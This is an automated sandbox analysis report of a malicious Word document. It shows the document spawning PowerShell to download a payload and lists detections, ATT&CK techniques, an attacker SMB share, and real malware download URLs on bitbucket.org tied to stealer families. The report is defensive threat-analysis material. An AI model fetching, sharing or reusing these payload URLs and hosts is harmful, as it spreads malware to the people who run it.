Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\scandoc.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\rspro.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\pdf_filetype_icon_177525.ico
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\rspro.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\pdf_filetype_icon_177525.ico
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\rspro.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\rspro.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\rspro.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\pdf_filetype_icon_177525.ico
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\pdf_filetype_icon_177525.ico
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\pdf_filetype_icon_177525.ico
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\putty.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\scandoc.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\putty.exe.Config
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\scandoc.exe.Config
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 221 Scripting | 1 DLL Side-Loading | 1 DLL Side-Loading | 221 Scripting | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Abuse Accessibility Features | Acquire Infrastructure | Gather Victim Identity Information |
| Default Accounts | 13 Exploitation for Client Execution | 1 BITS Jobs | 1 Extra Window Memory Injection | 1 Obfuscated Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Encrypted Channel | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials |
| Domain Accounts | 211 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 12 Process Injection | 1 Install Root Certificate | Security Account Manager | 2 Network Share Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | | | Data Encrypted for Impact | DNS Server | Email Addresses |
| Local Accounts | 1 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Timestomp | NTDS | 11 Security Software Discovery | Distributed Component Object Model | Input Capture | Traffic Duplication | 13 Application Layer Protocol | | | Data Destruction | Virtual Private Server | Employee Names |
| Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Scheduled Transfer | Fallback Channels | | | Data Encrypted for Impact | Server | Gather Victim Network Information |
| Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication | | | Service Stop | Botnet | Domain Properties |
| External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port | | | Inhibit System Recovery | Web Services | DNS |
| Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Modify Registry | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Exfiltration Over Alternative Protocol | Application Layer Protocol | | | Defacement | Serverless | Network Trust Dependencies |
| Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Web Protocols | | | Internal Defacement | Malvertising | Network Topology |
| Supply Chain Compromise | PowerShell | Cron | Cron | 1 BITS Jobs | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | File Transfer Protocols | | | External Defacement | Compromise Infrastructure | IP Addresses |
| Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 12 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Exfiltration Over Unencrypted Non-C2 Protocol | Mail Protocols | | | Firmware Corruption | Domains | Network Security Appliances |
| Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Rundll32 | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | Exfiltration Over Physical Medium | DNS | | | Resource Hijacking | DNS Server | Gather Victim Org Information |

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1365471, Sample: 42#U0430.doc, Startdate: 21/12/2023, Architecture: WINDOWS, Score: 100

Process tree (node numbers as in the graph; the bare numbers after a process name are the counts shown next to it, see legend):

  • 2 (root): Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 7 other signatures
    • 2 -> 9 WINWORD.EXE (292 24): dropped C:\Users\user\...\~DF23BD85EE3DE97CB5.TMP, Composite; Suspicious powershell command line found; Opens network shares; Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)
      • 9 -> 17 GB.exe (1 4): dropped C:\Users\user\AppData\Local\...\test2.exe, PE32+
        • 17 -> 27 cmd.exe: Suspicious powershell command line found; Very long command line found
          • 27 -> 30 powershell.exe (12 5): bitbucket.org 104.192.141.1, 443, 49164 AMAZON-02US United States; s3-w.us-east-1.amazonaws.com; 2 other IPs or domains; Installs new ROOT certificates; Uses cmd line tools excessively to alter registry or file data; Powershell uses Background Intelligent Transfer Service (BITS)
            • 30 -> 39 reg.exe (1)
            • 30 -> 41 reg.exe (1)
            • 30 -> 43 reg.exe
            • 30 -> 45 reg.exe
          • 27 -> 34 xcopy.exe (2): dropped C:\Users\user\AppData\Local\...\test2.exe, PE32+
          • 27 -> 37 cmd.exe
      • 9 -> 20 powershell.exe (4): Uses cmd line tools excessively to alter registry or file data
      • 9 -> 23 explorer.exe: Opens network shares
    • 2 -> 13 explorer.exe (8 4)
    • 2 -> 15 explorer.exe (14 30)
      • 15 -> 25 rundll32.exe

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 42#U0430.doc | 42% | Virustotal | |
| 42#U0430.doc | 100% | Avira | HEUR/Macro.Downloader.AMAK.Gen |
| 42#U0430.doc | 100% | Joe Sandbox ML | |
| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\~DF23BD85EE3DE97CB5.TMP | 100% | Avira | HEUR/Macro.Downloader.AMAK.Gen |
| C:\Users\user\AppData\Local\Temp\~DF23BD85EE3DE97CB5.TMP | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Local\Temp\IXP000.TMP\test2.exe | 11% | Virustotal | |
| C:\Users\user\AppData\Local\Temp\persistent2\test2.exe | 11% | Virustotal | |
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
| http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
| https://contoso.com/License | 0% | URL Reputation | safe |
| https://contoso.com/License | 0% | URL Reputation | safe |
| https://contoso.com/Icon | 0% | URL Reputation | safe |
| http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
| http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
| http://go.micros | 0% | URL Reputation | safe |
| http://go.micros | 0% | URL Reputation | safe |
| http://java.sun.com | 0% | URL Reputation | safe |
| http://java.sun.com | 0% | URL Reputation | safe |
| http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
| http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
| https://contoso.com/ | 0% | URL Reputation | safe |
| http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
| http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
| http://java.co | 0% | Avira URL Cloud | safe |
| http://java.co | 0% | Virustotal | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| s3-w.us-east-1.amazonaws.com | 54.231.199.241 | true | false | | high |
| bitbucket.org | 104.192.141.1 | true | false | | high |
| bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exe | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.376805682.0000000012341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://bbuseruploads.s3.amazonaws.com | powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.piriform.com/ccleaner) | explorer.exe, 0000000E.00000002.632976759.000000000266A000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://crl.entrust.net/server1.crl0 | powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://ocsp.entrust.net03 | powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown |
| http://bitbucket.org | powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://web-security-reports.services.atlassian.com/csp-report/bb-website | powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/License | powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown |
| https://contoso.com/Icon | powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 0000000B.00000002.391663210.000000001C4AF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://d136azpfpnge1l.cloudfront.net/; | powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://go.micros | powershell.exe, 0000000B.00000002.385447053.0000000003843000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown |
| https://bitbucket.org/o | powershell.exe, 0000000B.00000002.385447053.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://java.sun.com | explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown |
| http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 0000000B.00000002.391663210.000000001C4AF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown |
| http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 0000000E.00000002.633272083.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.632976759.0000000002580000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://cdn.cookielaw.org/ | powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.376805682.0000000012341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://java.co | explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| http://www.piriform.com/ccleaner | explorer.exe, 0000000E.00000002.633272083.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.632976759.000000000266A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.632976759.0000000002580000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://aui-cdn.atlassian.com/ | powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.autoitscript.com/autoit3 | explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://remote-app-switcher.stg-east.frontend.public.atl-paas.net | powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://support.mozilla.org | explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.piriform.com/ccleanerv | explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://d301sr5gafysq2.cloudfront.net/ | powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://ocsp.entrust.net0D | powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.374553660.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002351000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://bitbucket.org | powershell.exe, 0000000B.00000002.385447053.0000000002C13000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://secure.comodo.com/CPS0 | powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C491000.00000004.00000020.00020000.00000000.sdmp | false | | |
                                                      high
                                                      http://www.piriform.com/cclexplorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bbuseruploads.s3.amazonaws.com/7ea556d7-c0f5-4b27-9352-362ff0b0d6cb/downloads/2850b0f6-002e-powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.192.141.1 | bitbucket.org | United States | 16509 | AMAZON-02US | false
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1365471
Start date and time: 2023-12-21 09:49:25 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 42#U0430.doc
renamed because original name is a hash value
Original Sample Name: .doc
Detection: MAL
Classification: mal100.spyw.expl.evad.winDOC@27/19@6/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 6
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.91.175.30, 104.91.175.23
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target powershell.exe, PID 3560 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:50:11 | API Interceptor | 3363x Sleep call for process: explorer.exe modified
09:50:22 | API Interceptor | 1x Sleep call for process: GB.exe modified
09:50:23 | API Interceptor | 83x Sleep call for process: powershell.exe modified
Match: 104.192.141.1
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
A662vmc5co.exe | Get hash | malicious | Unknown | Browse | bitbucket.org/kennethoswald1/aoz918/downloads/LEraggt.exe
lahPWgosNP.exe | Get hash | malicious | Amadey | Browse | bitbucket.org/alex222111/testproj/downloads/s7.exe
SecuriteInfo.com.HEUR.Trojan.Script.Generic.18657.xlsx | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets/tinypro/rEG6d7/ba869eaf2433f3e0b56e4d0776eb5117fc09b21f/files/street-main
SecuriteInfo.com.HEUR.Trojan.Script.Generic.18657.xlsx | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets/tinypro/rEG6d7/ba869eaf2433f3e0b56e4d0776eb5117fc09b21f/files/street-main
SecuriteInfo.com.HEUR.Trojan.Script.Generic.20331.xlsx | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets
SecuriteInfo.com.HEUR.Trojan.Script.Generic.20331.xlsx | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets
Paid invoice.ppa | Get hash | malicious | AgentTesla | Browse | bitbucket.org/!api/2.0/snippets/warzonepro/Egjbp5/1b96dd9b300f88e62e18db3170d33bf037793d72/files/euromanmain
PO#1487958_10.ppa | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets/warzonepro/KME7g4/7678df565d5a8824274645a03590fc72588243f0/files/orignalfinal
Purchase Inquiry_pdf.ppa | Get hash | malicious | AgentTesla | Browse | bitbucket.org/!api/2.0/snippets/warzonepro/8E74BM/47d1c5bd6af9e6b1718ba4d2e049cba6beb1ac95/files/charles1final
Purchase Inquiry_pdf.ppa | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets/warzonepro/8E74BM/47d1c5bd6af9e6b1718ba4d2e049cba6beb1ac95/files/charles1final
Purchase Inquiry_pdf.ppa | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets/rikimartinplace/KMMe6p/84dd89e3da0a597f178af84b75fa301869bb9740/files/charlesfinal
Purchase Inquiry_pdf.ppa | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets/rikimartinplace/KMMe6p/84dd89e3da0a597f178af84b75fa301869bb9740/files/charlesfinal
RFQ#20220613124723.ppa | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets/rikimartinplace/rEEzox/303cc98eeee4e8ce0be2a39a1aec7973fa1d5a9f/files/centfinal
Quotation.ppa | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets/rikimartinplace/bkkdM5/d967ec385ca0c9659e1ddb22731d05b19661a471/files/nanafinal
Quotation.ppa | Get hash | malicious | Unknown | Browse | bitbucket.org/!api/2.0/snippets/rikimartinplace/bkkdM5/d967ec385ca0c9659e1ddb22731d05b19661a471/files/nanafinal
pn6xLHVgz8.exe | Get hash | malicious | RedLine SmokeLoader Tofsee Vidar | Browse | bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/socks_protected.exe
k8XfIrqzNR.exe | Get hash | malicious | RedLine SmokeLoader Tofsee Vidar | Browse | bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/socks_protected.exe
qsJjHqJ7T0.exe | Get hash | malicious | RedLine SmokeLoader Tofsee Vidar | Browse | bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/socks_protected.exe
AhB0i1fe7I.exe | Get hash | malicious | Clipboard Hijacker SmokeLoader Vidar | Browse | bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe
cj6LIPaeUz.exe | Get hash | malicious | Vidar Xmrig | Browse | bitbucket.org/abobik141231321/download/downloads/main.exe
Match: bitbucket.org
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
2OcriJkWk6.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT | Browse | 104.192.141.1
lPUOqVqw1D.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT | Browse | 104.192.141.1
OE9ZntaKqM.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT | Browse | 104.192.141.1
Z0m3hA5H5V.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT | Browse | 104.192.141.1
7C3J00l6fa.exe | Get hash | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc | Browse | 104.192.141.1
8RYB9RzQA5.exe | Get hash | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc | Browse | 104.192.141.1
tx2WEPjzLS.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, zgRAT | Browse | 104.192.141.1
GarEwUZuLO.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar | Browse | 104.192.141.1
Zgh9WMogTw.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT | Browse | 104.192.141.1
o7dKnIGaW3.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar | Browse | 104.192.141.1
bbSC5jm8tF.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 104.192.141.1
74APa4Tj5X.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar | Browse | 104.192.141.1
Ahn3lzq3wm.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar | Browse | 104.192.141.1
rpmOhktwoL.exe | Get hash | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc | Browse | 104.192.141.1
NpXHmOjKt2.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar | Browse | 104.192.141.1
X9TRynCrTi.exe | Get hash | malicious | LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 104.192.141.1
12hMgY5GVz.exe | Get hash | malicious | LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 104.192.141.1
JOXaGO98rW.exe | Get hash | malicious | LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 104.192.141.1
ImuxbCF4JK.exe | Get hash | malicious | LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 104.192.141.1
XrapI44JaW.exe | Get hash | malicious | LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 104.192.141.1
Match: s3-w.us-east-1.amazonaws.com
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
2OcriJkWk6.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT | Browse | 54.231.196.9
https://article.barksnomore.com/bark-reform-vl/?cep=Hi1NB3hb1eETlCMxFF6Hd4-_AsC6kDen8OL6m_Ea0GeJgDdR5yVDq5uLxbnQGvRbjshNl3_JrO13qnXxBNXzl5xSuaT5wbi9K7ruiL-K0zfTtH4mutpwVIa5JJerp5WBif4s9DJLVBIeWlPxDQY03dz7ABnh3jDX7rnxzRnz6TEsgn3B7RfGpYN4uCKkU1-AQY0sbuYj3Gxch7dZUf2cfMIgMLUJubR2i5VwfUmA69NQjWyAv9ZCVWuFVXyPql44VJoZ-zDXkAkoR47sZySoYC3t5ST-JbNdlyVa61eI98HHHoZ4co78GJa3rTNahsqFAjlJCqrofz6NO6vFh8onv9Upfjs3yycyrZmYqiZxEdwzyaYOKCJuGQZ9xoy0JLIFvpgXxIdJEUJApqxaqn-nGDyVydBeQsuOEXrkbEQ1jAWG8QyEpt30JIZnh39r7MehsK4WFKY_tD2DOL-Ywx2kGFQMGK5VcTSYPYYjOWG4bJAhHksOn8TnuZcubDRlswT3-Q6m3RFkTlTFMDS2j1kY8BLzc3R3dajuwwPW5uAAuTjFapLiAKf0pDnVeY8Q1Pz8FBuClrupmWuUfLuM7XMygtzA_C9umC74beMXvE-VRl_wlKWk0VFqExagucLaDAfoE4o4A5br7jk7OKjpeVwH52Rj49N3b4Qet9c5Nkbr4wDpQ6KCXQzofhOhtxi6jjJ-_JdzSMLMMidcTpGmJdqb5znRu6MWVm0hORcVU0-cDJiZDLER4hPti8jR0WD79FnnxAnwtKODg3dtfJMG03aapcvYN_In9_TBcmBcW6AMtsU&lptoken=1723035110ad048f75f2&site=yahoo-home&site_id=1551771&title=Do+This+To+Stop+Your+Dog's+Barking+-+Works+For+All+Breeds&platform=Desktop&campaign_id=31821115&campaign_item_id=3883976247&thumbnail=http://cdn.taboola.com/libtrc/static/thumbnails/41137d83424b6c8b8363711776dc79a8.jpg&click_id=GiDnWzesQtvJXSOEHTBP1NpNUfi2W4eIQ7x4XShlFZVqOiCc_WEoqqHT37DJ891w&tblci=GiDnWzesQtvJXSOEHTBP1NpNUfi2W4eIQ7x4XShlFZVqOiCc_WEoqqHT37DJ891w | Get hash | malicious | Unknown | Browse | 3.5.29.180
lPUOqVqw1D.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT | Browse | 52.216.163.3
OE9ZntaKqM.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT | Browse | 3.5.29.183
